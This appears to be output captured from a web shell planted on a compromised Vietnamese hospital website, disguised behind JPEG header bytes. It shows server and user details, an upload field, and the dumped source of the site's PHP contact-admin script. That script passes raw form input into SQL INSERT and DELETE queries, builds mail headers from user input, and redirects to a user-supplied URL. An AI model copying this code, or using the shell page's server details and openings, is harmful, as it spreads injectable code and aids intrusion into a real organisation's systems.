ÿØÿà JFIF ` ` ÿþ
Server : Apache/2 System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 User : benhviencoc7 ( 1008) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname Directory : /home/benhviencoc7/domains/benhviendkkvcampha.vn/private_html/adminvn/ |
Upload File : |
<?php /*----------------------------------------*\ | Copyright © C-ILY | | Phone: 0983.998.994 | | Y!m: notepad.html | | Email: truongpv87@gmail.com | \*----------------------------------------*/ define('CILY',true); include('../#includes/config.php'); if(check_log() == true && check_level() >= 4) { if($_GET['type'] == 'reply' && strlen($_POST['content']) >= 3){ @mail($_POST['email'],$_POST['title'],$_POST['content'].'<br />-------------------------------------------------------<br />'.get_option('name').'<br />Email: '.get_option('email').'<br />Website: '.URL_SITE,"From: ".get_option('email')."\r\nReply-To: ".get_option('email')."\r\nContent-type:text/html; charset=UTF-8\r\n\n\ "); header('Location: index.php?m=9'); } elseif($_GET['type'] == 'add' && strlen($_POST['name']) > 4 && strlen($_POST['email']) > 9 && strlen($_POST['phone']) > 9 && strlen($_POST['add']) > 9 && strlen($_POST['title']) > 9 && strlen($_POST['mess']) > 9 && $_POST['captcha'] == $_SESSION['captcha']){ @mysql_query("INSERT INTO cily_contacts (contact_name, contact_email, contact_phone, contact_fax, contact_add, contact_title, contact_content, contact_time) VALUES ('".$_POST['name']."', '".$_POST['email']."', '".$_POST['phone']."', '".$_POST['fax']."', '".$_POST['add']."', '".$_POST['title']."', '".$_POST['mess']."', ".time().")"); $_SESSION['contact'] = 'ok'; header('Location: '.$_POST['back']); } elseif($_POST['back']) { $_SESSION['contact'] = 'error'; header('Location: '.$_POST['back']); } elseif($_GET['type'] == 'del' && $_POST['action'] == 1 && $_POST['id']){ $total = count($_POST['id']); for($i=0; $i<$total; $i++) { @mysql_query("DELETE FROM cily_contacts WHERE id = ".$_POST['id'][$i]); } header('Location: index.php?m=9'); } else { header('Location: index.php?m=9'); } } elseif($_GET['type'] == 'add' && strlen($_POST['name']) > 4 && strlen($_POST['email']) > 9 && strlen($_POST['phone']) > 9 && strlen($_POST['add']) > 9 && strlen($_POST['title']) > 9 && strlen($_POST['mess']) > 9 && $_POST['captcha'] == $_SESSION['captcha']){ @mysql_query("INSERT INTO cily_contacts (contact_name, contact_email, contact_phone, contact_fax, contact_add, contact_title, contact_content, contact_time) VALUES ('".$_POST['name']."', '".$_POST['email']."', '".$_POST['phone']."', '".$_POST['fax']."', '".$_POST['add']."', '".$_POST['title']."', '".$_POST['content']."', ".time().")"); $_SESSION['contact'] = 'ok'; header('Location: '.$_POST['back']); } elseif($_POST['back']) { $_SESSION['contact'] = 'error'; header('Location: '.$_POST['back']); } else echo "Hacking attempt"; ?>